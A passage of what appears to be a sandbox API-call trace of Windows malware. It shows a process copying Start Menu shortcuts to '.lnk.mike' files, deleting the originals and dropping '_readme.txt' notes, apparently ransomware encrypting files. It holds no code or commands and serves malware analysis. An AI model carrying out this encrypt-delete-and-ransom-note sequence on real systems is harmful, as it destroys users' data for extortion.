lpFilePart=0x0) returned 0x13 [0138.983] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Ringtones", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Ringtones", lpFilePart=0x0) returned 0x2a [0138.987] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.987] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.987] CoTaskMemFree (pv=0x4e1c10) [0138.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.988] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Sqm", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Sqm", lpFilePart=0x0) returned 0x24 [0138.988] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.988] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.988] CoTaskMemFree (pv=0x4e1c10) [0138.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.989] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Manifest", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Manifest", lpFilePart=0x0) returned 0x2d [0138.989] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.989] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.989] CoTaskMemFree (pv=0x4e1c10) [0138.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.989] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Sessions", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Sessions", lpFilePart=0x0) returned 0x2d [0138.990] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.990] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.990] CoTaskMemFree (pv=0x4e1c10) [0138.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.990] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Upload", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Upload", lpFilePart=0x0) returned 0x2b [0138.990] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.990] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.990] CoTaskMemFree (pv=0x4e1c10) [0138.991] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu", lpFilePart=0x0) returned 0x2b [0138.991] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.992] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk.mike", lpFilePart=0x0) returned 0x45 [0138.992] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk", lpFilePart=0x0) returned 0x40 [0138.992] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk.mike", lpFilePart=0x0) returned 0x45 [0138.998] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk.mike", lpFilePart=0x0) returned 0x45 [0138.998] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk.mike", lpFilePart=0x0) returned 0x45 [0138.998] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk", dwFileAttributes=0x80) returned 1 [0138.999] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk", lpFilePart=0x0) returned 0x40 [0138.999] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\default programs.lnk")) returned 1 [0139.000] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk", lpFilePart=0x0) returned 0x40 [0139.000] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\_readme.txt", lpFilePart=0x0) returned 0x37 [0139.003] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0139.003] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk.mike", lpFilePart=0x0) returned 0x43 [0139.004] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk", lpFilePart=0x0) returned 0x3e [0139.004] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk.mike", lpFilePart=0x0) returned 0x43 [0139.009] WriteFile (in: hFile=0x280, lpBuffer=0x21036b0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21036b0*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0139.009] CloseHandle (hObject=0x280) returned 1 [0139.009] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk", lpFilePart=0x0) returned 0x3e [0139.009] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk.mike", lpFilePart=0x0) returned 0x43 [0139.009] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk.mike", lpFilePart=0x0) returned 0x43 [0139.009] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk", dwFileAttributes=0x80) returned 1 [0139.010] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk", lpFilePart=0x0) returned 0x3e [0139.010] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\windows update.lnk")) returned 1 [0139.011] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk", lpFilePart=0x0) returned 0x3e [0139.011] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\_readme.txt", lpFilePart=0x0) returned 0x37 [0139.013] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.013] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.013] CoTaskMemFree (pv=0x4e1c10) [0139.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.013] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", lpFilePart=0x0) returned 0x34 [0139.014] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0139.014] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk.mike", lpFilePart=0x0) returned 0x4c [0139.015] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk", lpFilePart=0x0) returned 0x47 [0139.015] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk.mike", lpFilePart=0x0) returned 0x4c [0139.019] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk.mike", lpFilePart=0x0) returned 0x4c [0139.019] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk.mike", lpFilePart=0x0) returned 0x4c [0139.019] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk", dwFileAttributes=0x80) returned 1 [0139.019] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk", lpFilePart=0x0) returned 0x47 [0139.019] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\adobe reader x.lnk")) returned 1 [0139.020] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk", lpFilePart=0x0) returned 0x47 [0139.022] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0139.028] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Google Chrome.lnk", dwFileAttributes=0x80) returned 1 [0139.031] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0139.035] WriteFile (in: hFile=0x280, lpBuffer=0x21403e4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21403e4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0139.036] CloseHandle (hObject=0x280) returned 1 [0139.036] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Media Center.lnk", dwFileAttributes=0x80) returned 1 [0139.041] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0139.046] WriteFile (in: hFile=0x280, lpBuffer=0x2150d88*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2150d88*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0139.046] CloseHandle (hObject=0x280) returned 1 [0139.047] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Mozilla Firefox.lnk", dwFileAttributes=0x80) returned 1 [0139.050] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0139.054] WriteFile (in: hFile=0x280, lpBuffer=0x216193c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x216193c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0139.054] CloseHandle (hObject=0x280) returned 1 [0139.055] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Sidebar.lnk", dwFileAttributes=0x80) returned 1 [0139.058] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0139.062] WriteFile (in: hFile=0x280, lpBuffer=0x217288c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x217288c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0139.063] CloseHandle (hObject=0x280) returned 1 [0139.063] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk", dwFileAttributes=0x80) returned 1 [0139.066] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0139.072] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows DVD Maker.lnk", dwFileAttributes=0x80) returned 1 [0139.075] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0139.081] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Fax and Scan.lnk", dwFileAttributes=0x80) returned 1 [0139.085] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0139.090] WriteFile (in: hFile=0x280, lpBuffer=0x21a57fc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21a57fc*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0139.090] CloseHandle (hObject=0x280) returned 1 [0139.090] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Media Player.lnk", dwFileAttributes=0x80) returned 1 [0139.093] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0139.097] WriteFile (in: hFile=0x280, lpBuffer=0x21b62b0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21b62b0*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0139.097] CloseHandle (hObject=0x280) returned 1 [0139.098] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\XPS Viewer.lnk", dwFileAttributes=0x80) returned 1 [0139.112] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.112] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.112] CoTaskMemFree (pv=0x4e1c10) [0139.112] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.117] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Calculator.lnk", dwFileAttributes=0x80) returned 1 [0139.120] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.125] WriteFile (in: hFile=0x280, lpBuffer=0x21e2d88*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21e2d88*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0139.125] CloseHandle (hObject=0x280) returned 1 [0139.126] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\displayswitch.lnk", dwFileAttributes=0x80) returned 1 [0139.130] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.135] WriteFile (in: hFile=0x280, lpBuffer=0x21f3fe4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21f3fe4*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0139.135] CloseHandle (hObject=0x280) returned 1 [0139.136] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk", dwFileAttributes=0x80) returned 1 [0139.139] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.144] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk", dwFileAttributes=0x80) returned 1 [0139.147] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.153] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk", dwFileAttributes=0x80) returned 1 [0139.156] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.162] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk", dwFileAttributes=0x80) returned 1 [0139.166] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.172] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk", dwFileAttributes=0x80) returned 1 [0139.174] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.179] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk", dwFileAttributes=0x80) returned 1 [0139.181] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.187] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk", dwFileAttributes=0x80) returned 1 [0139.191] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.196] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk", dwFileAttributes=0x80) returned 1 [0139.200] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.206] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sync Center.lnk", dwFileAttributes=0x80) returned 1 [0139.209] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", 